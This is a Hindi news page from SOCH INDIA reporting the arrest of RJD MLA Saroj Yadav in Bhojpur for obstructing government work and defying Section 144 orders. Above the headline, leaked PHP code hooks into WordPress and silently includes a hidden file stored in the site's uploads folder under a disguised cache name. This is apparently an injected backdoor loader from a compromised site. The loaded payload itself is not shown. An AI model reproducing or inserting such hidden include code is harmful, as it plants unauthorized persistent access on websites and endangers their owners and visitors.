add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); राजद विधायक सरोज यादव गिरफ्तार, सरकारी काम में बाधा डालने का आरोप – SOCH INDIA
Menu

अपराध समाचार
राजद विधायक सरोज यादव गिरफ्तार, सरकारी काम में बाधा डालने का आरोप

nobanner

सरकारी काम में बाधा डालने के आरोप में आरा जिले के बड़हरा थानाक्षेत्र के राजद विधायक सरोज यादव को पुलिस ने गिरफ्तार कर लिया है। सरोज यादव को पुलिस ने उस वक्त गिरफ्तार किया जब वे सैकड़ो समर्थको के साथ धारा 144 का उल्लंघन कर भोजपुर समाहरणालय के समक्ष धरना देने जा रहे थे।

विधायक की गिरफ्तारी के बाद एहतियात के तौर पर पूरे शहर की सुरक्षा व्यवस्था बढ़ा दी गई है, जिसकी मॉनिटरिंग स्वयं एसपी अवकाश कुमार कर रहे हैं।

बता दें कि सरोज यादव को एक दबंग छवि का नेता माना जाता है। उनकी गिरफ्तारी के लिए वहां पहले से सदर एसडीओ अरुण कुमार, एसडीपीओ संजय कुमार एवम दंडाधिकारी विकाश कुमार के नेतृत्व भारी संख्या में पुलिस बल के जवान मौजूद थे।